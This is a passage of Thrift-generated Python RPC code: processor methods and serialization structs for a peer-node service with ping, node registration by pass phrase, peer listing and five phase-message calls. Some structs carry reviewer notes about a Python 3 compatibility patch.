    except Exception as ex:
      msg_type = TMessageType.EXCEPTION
      logging.exception(ex)
      result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
    oprot.writeMessageBegin("phase_4_message", msg_type, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()

  def process_phase_5_message(self, seqid, iprot, oprot):
    args = phase_5_message_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = phase_5_message_result()
    try:
      self._handler.phase_5_message(args.p5)
      msg_type = TMessageType.REPLY
    except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
      raise
    except Exception as ex:
      msg_type = TMessageType.EXCEPTION
      logging.exception(ex)
      result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
    oprot.writeMessageBegin("phase_5_message", msg_type, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()

  def process_get_peers(self, seqid, iprot, oprot):
    args = get_peers_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = get_peers_result()
    try:
      result.success = self._handler.get_peers()
      msg_type = TMessageType.REPLY
    except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
      raise
    except UnauthorizedException as unauthorized:
      msg_type = TMessageType.REPLY
      result.unauthorized = unauthorized
    except Exception as ex:
      msg_type = TMessageType.EXCEPTION
      logging.exception(ex)
      result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
    oprot.writeMessageBegin("get_peers", msg_type, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class ping_args:
  """Argument struct for ping() — no fields.

  NOTE(review): hand-patched from the Thrift 0.9.3 output only to use
  dict.items() (valid on Python 2 and 3) instead of the Python-2-only
  iteritems() in __repr__; regenerating would need this re-applied.
  """

  thrift_spec = (
  )

  def read(self, iprot):
    # Fast path: C-accelerated decode when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('ping_args')
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __hash__(self):
    value = 17
    return value

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class ping_result:
  """Result struct for ping() — void return, no fields.

  NOTE(review): hand-patched only to use dict.items() (Py2/Py3) instead
  of the Python-2-only iteritems() in __repr__.
  """

  thrift_spec = (
  )

  def read(self, iprot):
    # Fast path: C-accelerated decode when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('ping_result')
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __hash__(self):
    value = 17
    return value

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class get_node_info_args:
  """Argument struct for get_node_info() — no fields.

  NOTE(review): hand-patched only to use dict.items() (Py2/Py3) instead
  of the Python-2-only iteritems() in __repr__.
  """

  thrift_spec = (
  )

  def read(self, iprot):
    # Fast path: C-accelerated decode when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_node_info_args')
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __hash__(self):
    value = 17
    return value

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class get_node_info_result:
  """Result struct for get_node_info().

  NOTE(review): hand-patched only to use dict.items() (Py2/Py3) instead
  of the Python-2-only iteritems() in __repr__.

  Attributes:
   - success
   - unauthorized
  """

  thrift_spec = (
    (0, TType.STRUCT, 'success', (Node, Node.thrift_spec), None, ),  # 0
    (1, TType.STRUCT, 'unauthorized', (UnauthorizedException, UnauthorizedException.thrift_spec), None, ),  # 1
  )

  def __init__(self, success=None, unauthorized=None,):
    self.success = success
    self.unauthorized = unauthorized

  def read(self, iprot):
    # Fast path: C-accelerated decode when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.STRUCT:
          self.success = Node()
          self.success.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.unauthorized = UnauthorizedException()
          self.unauthorized.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_node_info_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.STRUCT, 0)
      self.success.write(oprot)
      oprot.writeFieldEnd()
    if self.unauthorized is not None:
      oprot.writeFieldBegin('unauthorized', TType.STRUCT, 1)
      self.unauthorized.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __hash__(self):
    value = 17
    value = (value * 31) ^ hash(self.success)
    value = (value * 31) ^ hash(self.unauthorized)
    return value

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class register_node_args:
  """Argument struct for register_node(node, pass_phrase).

  NOTE(review): hand-patched only to use dict.items() (Py2/Py3) instead
  of the Python-2-only iteritems() in __repr__.

  Attributes:
   - node
   - pass_phrase
  """

  thrift_spec = (
    None,  # 0
    (1, TType.STRUCT, 'node', (Node, Node.thrift_spec), None, ),  # 1
    (2, TType.STRING, 'pass_phrase', None, None, ),  # 2
  )

  def __init__(self, node=None, pass_phrase=None,):
    self.node = node
    self.pass_phrase = pass_phrase

  def read(self, iprot):
    # Fast path: C-accelerated decode when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.node = Node()
          self.node.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRING:
          self.pass_phrase = iprot.readString()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('register_node_args')
    if self.node is not None:
      oprot.writeFieldBegin('node', TType.STRUCT, 1)
      self.node.write(oprot)
      oprot.writeFieldEnd()
    if self.pass_phrase is not None:
      oprot.writeFieldBegin('pass_phrase', TType.STRING, 2)
      oprot.writeString(self.pass_phrase)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __hash__(self):
    value = 17
    value = (value * 31) ^ hash(self.node)
    value = (value * 31) ^ hash(self.pass_phrase)
    return value

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class register_node_result:
  """Result struct for register_node().

  NOTE(review): hand-patched only to use dict.items() (Py2/Py3) instead
  of the Python-2-only iteritems() in __repr__.

  Attributes:
   - success
   - unauthorized
  """

  thrift_spec = (
    (0, TType.BOOL, 'success', None, None, ),  # 0
    (1, TType.STRUCT, 'unauthorized', (UnauthorizedException, UnauthorizedException.thrift_spec), None, ),  # 1
  )

  def __init__(self, success=None, unauthorized=None,):
    self.success = success
    self.unauthorized = unauthorized

  def read(self, iprot):
    # Fast path: C-accelerated decode when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.BOOL:
          self.success = iprot.readBool()
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.unauthorized = UnauthorizedException()
          self.unauthorized.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('register_node_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.BOOL, 0)
      oprot.writeBool(self.success)
      oprot.writeFieldEnd()
    if self.unauthorized is not None:
      oprot.writeFieldBegin('unauthorized', TType.STRUCT, 1)
      self.unauthorized.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __hash__(self):
    value = 17
    value = (value * 31) ^ hash(self.success)
    value = (value * 31) ^ hash(self.unauthorized)
    return value

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class unregister_node_args:
  """Argument struct for the oneway unregister_node(pass_phrase).

  NOTE(review): hand-patched only to use dict.items() (Py2/Py3) instead
  of the Python-2-only iteritems() in __repr__.

  Attributes:
   - pass_phrase
  """

  thrift_spec = (
    None,  # 0
    (1, TType.STRING, 'pass_phrase', None, None, ),  # 1
  )

  def __init__(self, pass_phrase=None,):
    self.pass_phrase = pass_phrase

  def read(self, iprot):
    # Fast path: C-accelerated decode when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRING:
          self.pass_phrase = iprot.readString()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('unregister_node_args')
    if self.pass_phrase is not None:
      oprot.writeFieldBegin('pass_phrase', TType.STRING, 1)
      oprot.writeString(self.pass_phrase)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __hash__(self):
    value = 17
    value = (value * 31) ^ hash(self.pass_phrase)
    return value

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class phase_1_message_args:
    """Thrift argument struct for the phase_1_message service call.

    Attributes:
     - p1: the Phase_1_msg payload (STRUCT, field id 1)
    """

    thrift_spec = (
        None,  # 0
        (1, TType.STRUCT, 'p1', (Phase_1_msg, Phase_1_msg.thrift_spec), None, ),  # 1
    )

    def __init__(self, p1=None,):
        self.p1 = p1

    def read(self, iprot):
        """Deserialize this struct from *iprot*, skipping unknown fields."""
        if (iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
                and isinstance(iprot.trans, TTransport.CReadableTransport)
                and self.thrift_spec is not None
                and fastbinary is not None):
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            _, field_type, field_id = iprot.readFieldBegin()
            if field_type == TType.STOP:
                break
            if field_id == 1 and field_type == TType.STRUCT:
                self.p1 = Phase_1_msg()
                self.p1.read(iprot)
            else:
                iprot.skip(field_type)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        """Serialize this struct to *oprot*; None fields are omitted."""
        if (oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
                and self.thrift_spec is not None
                and fastbinary is not None):
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('phase_1_message_args')
        if self.p1 is not None:
            oprot.writeFieldBegin('p1', TType.STRUCT, 1)
            self.p1.write(oprot)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        """No required fields to check; always succeeds."""
        return None

    def __hash__(self):
        h = 17
        for field in (self.p1,):
            h = (h * 31) ^ hash(field)
        return h

    def __repr__(self):
        pairs = ('%s=%r' % (k, v) for k, v in self.__dict__.iteritems())
        return '%s(%s)' % (self.__class__.__name__, ', '.join(pairs))

    def __eq__(self, other):
        if not isinstance(other, self.__class__):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not self.__eq__(other)
class phase_1_message_result:
    """Thrift result struct for the void phase_1_message call.

    The call returns nothing, so the struct has no declared fields;
    read() simply drains and skips whatever arrives on the wire.
    """

    thrift_spec = ()

    def read(self, iprot):
        """Consume this (empty) struct from *iprot*."""
        if (iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
                and isinstance(iprot.trans, TTransport.CReadableTransport)
                and self.thrift_spec is not None
                and fastbinary is not None):
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            _, field_type, _ = iprot.readFieldBegin()
            if field_type == TType.STOP:
                break
            iprot.skip(field_type)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        """Emit this (empty) struct to *oprot*."""
        if (oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
                and self.thrift_spec is not None
                and fastbinary is not None):
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('phase_1_message_result')
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        """No fields to check; always succeeds."""
        return None

    def __hash__(self):
        # Seed only: no fields contribute.
        return 17

    def __repr__(self):
        pairs = ('%s=%r' % (k, v) for k, v in self.__dict__.iteritems())
        return '%s(%s)' % (self.__class__.__name__, ', '.join(pairs))

    def __eq__(self, other):
        if not isinstance(other, self.__class__):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not self.__eq__(other)
class phase_2_message_args:
    """Thrift argument struct for the phase_2_message service call.

    Attributes:
     - p2: the Phase_2_msg payload (STRUCT, field id 1)
    """

    thrift_spec = (
        None,  # 0
        (1, TType.STRUCT, 'p2', (Phase_2_msg, Phase_2_msg.thrift_spec), None, ),  # 1
    )

    def __init__(self, p2=None,):
        self.p2 = p2

    def read(self, iprot):
        """Deserialize this struct from *iprot*, skipping unknown fields."""
        if (iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
                and isinstance(iprot.trans, TTransport.CReadableTransport)
                and self.thrift_spec is not None
                and fastbinary is not None):
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            _, field_type, field_id = iprot.readFieldBegin()
            if field_type == TType.STOP:
                break
            if field_id == 1 and field_type == TType.STRUCT:
                self.p2 = Phase_2_msg()
                self.p2.read(iprot)
            else:
                iprot.skip(field_type)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        """Serialize this struct to *oprot*; None fields are omitted."""
        if (oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
                and self.thrift_spec is not None
                and fastbinary is not None):
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('phase_2_message_args')
        if self.p2 is not None:
            oprot.writeFieldBegin('p2', TType.STRUCT, 1)
            self.p2.write(oprot)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        """No required fields to check; always succeeds."""
        return None

    def __hash__(self):
        h = 17
        for field in (self.p2,):
            h = (h * 31) ^ hash(field)
        return h

    def __repr__(self):
        pairs = ('%s=%r' % (k, v) for k, v in self.__dict__.iteritems())
        return '%s(%s)' % (self.__class__.__name__, ', '.join(pairs))

    def __eq__(self, other):
        if not isinstance(other, self.__class__):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not self.__eq__(other)
class phase_2_message_result:
    """Thrift result struct for the void phase_2_message call.

    The call returns nothing, so the struct has no declared fields;
    read() simply drains and skips whatever arrives on the wire.
    """

    thrift_spec = ()

    def read(self, iprot):
        """Consume this (empty) struct from *iprot*."""
        if (iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
                and isinstance(iprot.trans, TTransport.CReadableTransport)
                and self.thrift_spec is not None
                and fastbinary is not None):
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            _, field_type, _ = iprot.readFieldBegin()
            if field_type == TType.STOP:
                break
            iprot.skip(field_type)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        """Emit this (empty) struct to *oprot*."""
        if (oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
                and self.thrift_spec is not None
                and fastbinary is not None):
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('phase_2_message_result')
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        """No fields to check; always succeeds."""
        return None

    def __hash__(self):
        # Seed only: no fields contribute.
        return 17

    def __repr__(self):
        pairs = ('%s=%r' % (k, v) for k, v in self.__dict__.iteritems())
        return '%s(%s)' % (self.__class__.__name__, ', '.join(pairs))

    def __eq__(self, other):
        if not isinstance(other, self.__class__):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not self.__eq__(other)
class phase_3_message_args:
    """Thrift argument struct for the phase_3_message service call.

    Attributes:
     - p3: the Phase_3_msg payload (STRUCT, field id 1)
    """

    thrift_spec = (
        None,  # 0
        (1, TType.STRUCT, 'p3', (Phase_3_msg, Phase_3_msg.thrift_spec), None, ),  # 1
    )

    def __init__(self, p3=None,):
        self.p3 = p3

    def read(self, iprot):
        """Deserialize this struct from *iprot*, skipping unknown fields."""
        if (iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
                and isinstance(iprot.trans, TTransport.CReadableTransport)
                and self.thrift_spec is not None
                and fastbinary is not None):
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            _, field_type, field_id = iprot.readFieldBegin()
            if field_type == TType.STOP:
                break
            if field_id == 1 and field_type == TType.STRUCT:
                self.p3 = Phase_3_msg()
                self.p3.read(iprot)
            else:
                iprot.skip(field_type)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        """Serialize this struct to *oprot*; None fields are omitted."""
        if (oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
                and self.thrift_spec is not None
                and fastbinary is not None):
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('phase_3_message_args')
        if self.p3 is not None:
            oprot.writeFieldBegin('p3', TType.STRUCT, 1)
            self.p3.write(oprot)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        """No required fields to check; always succeeds."""
        return None

    def __hash__(self):
        h = 17
        for field in (self.p3,):
            h = (h * 31) ^ hash(field)
        return h

    def __repr__(self):
        pairs = ('%s=%r' % (k, v) for k, v in self.__dict__.iteritems())
        return '%s(%s)' % (self.__class__.__name__, ', '.join(pairs))

    def __eq__(self, other):
        if not isinstance(other, self.__class__):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not self.__eq__(other)
class phase_3_message_result:
    """Thrift result struct for the void phase_3_message call.

    The call returns nothing, so the struct has no declared fields;
    read() simply drains and skips whatever arrives on the wire.
    """

    thrift_spec = ()

    def read(self, iprot):
        """Consume this (empty) struct from *iprot*."""
        if (iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
                and isinstance(iprot.trans, TTransport.CReadableTransport)
                and self.thrift_spec is not None
                and fastbinary is not None):
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            _, field_type, _ = iprot.readFieldBegin()
            if field_type == TType.STOP:
                break
            iprot.skip(field_type)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        """Emit this (empty) struct to *oprot*."""
        if (oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
                and self.thrift_spec is not None
                and fastbinary is not None):
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('phase_3_message_result')
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        """No fields to check; always succeeds."""
        return None

    def __hash__(self):
        # Seed only: no fields contribute.
        return 17

    def __repr__(self):
        pairs = ('%s=%r' % (k, v) for k, v in self.__dict__.iteritems())
        return '%s(%s)' % (self.__class__.__name__, ', '.join(pairs))

    def __eq__(self, other):
        if not isinstance(other, self.__class__):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not self.__eq__(other)
class phase_4_message_args:
    """Thrift argument struct for the phase_4_message service call.

    Attributes:
     - p4: the Phase_4_msg payload (STRUCT, field id 1)
    """

    thrift_spec = (
        None,  # 0
        (1, TType.STRUCT, 'p4', (Phase_4_msg, Phase_4_msg.thrift_spec), None, ),  # 1
    )

    def __init__(self, p4=None,):
        self.p4 = p4

    def read(self, iprot):
        """Deserialize this struct from *iprot*, skipping unknown fields."""
        if (iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
                and isinstance(iprot.trans, TTransport.CReadableTransport)
                and self.thrift_spec is not None
                and fastbinary is not None):
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            _, field_type, field_id = iprot.readFieldBegin()
            if field_type == TType.STOP:
                break
            if field_id == 1 and field_type == TType.STRUCT:
                self.p4 = Phase_4_msg()
                self.p4.read(iprot)
            else:
                iprot.skip(field_type)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        """Serialize this struct to *oprot*; None fields are omitted."""
        if (oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
                and self.thrift_spec is not None
                and fastbinary is not None):
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('phase_4_message_args')
        if self.p4 is not None:
            oprot.writeFieldBegin('p4', TType.STRUCT, 1)
            self.p4.write(oprot)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        """No required fields to check; always succeeds."""
        return None

    def __hash__(self):
        h = 17
        for field in (self.p4,):
            h = (h * 31) ^ hash(field)
        return h

    def __repr__(self):
        pairs = ('%s=%r' % (k, v) for k, v in self.__dict__.iteritems())
        return '%s(%s)' % (self.__class__.__name__, ', '.join(pairs))

    def __eq__(self, other):
        if not isinstance(other, self.__class__):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not self.__eq__(other)
class phase_4_message_result:
    """Thrift result struct for the void phase_4_message call.

    The call returns nothing, so the struct has no declared fields;
    read() simply drains and skips whatever arrives on the wire.
    """

    thrift_spec = ()

    def read(self, iprot):
        """Consume this (empty) struct from *iprot*."""
        if (iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
                and isinstance(iprot.trans, TTransport.CReadableTransport)
                and self.thrift_spec is not None
                and fastbinary is not None):
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            _, field_type, _ = iprot.readFieldBegin()
            if field_type == TType.STOP:
                break
            iprot.skip(field_type)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        """Emit this (empty) struct to *oprot*."""
        if (oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
                and self.thrift_spec is not None
                and fastbinary is not None):
            oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('phase_4_message_result')
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        """No fields to check; always succeeds."""
        return None

    def __hash__(self):
        # Seed only: no fields contribute.
        return 17

    def __repr__(self):
        pairs = ('%s=%r' % (k, v) for k, v in self.__dict__.iteritems())
        return '%s(%s)' % (self.__class__.__name__, ', '.join(pairs))

    def __eq__(self, other):
        if not isinstance(other, self.__class__):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not self.__eq__(other)
class phase_5_message_args:
    """Thrift argument struct for the phase_5_message service call.

    Attributes:
     - p5: the Phase_5_msg payload (STRUCT, field id 1)
    """

    thrift_spec = (
        None,  # 0
        (1, TType.STRUCT, 'p5', (Phase_5_msg, Phase_5_msg.thrift_spec), None, ),  # 1
    )

    def __init__(self, p5=None,):
        self.p5 = p5

    def read(self, iprot):
        """Deserialize this struct from *iprot*, skipping unknown fields."""
        if (iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
                and isinstance(iprot.trans, TTransport.CReadableTransport)
                and self.thrift_spec is not None
                and fastbinary is not None):
            fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            _, field_type, field_id = iprot.readFieldBegin()
            if field_type == TType.STOP:
                break
            if field_id == 1 and field_type == TType.STRUCT:
                self.p5 = Phase_5_msg()
                self.p5.read(iprot)
            else:
                iprot.skip(field_type)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        """Serialize this struct to *oprot*; None fields are omitted."""
        if (oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
                and self.thrift_spec is not None
                and fastbinary is not None):
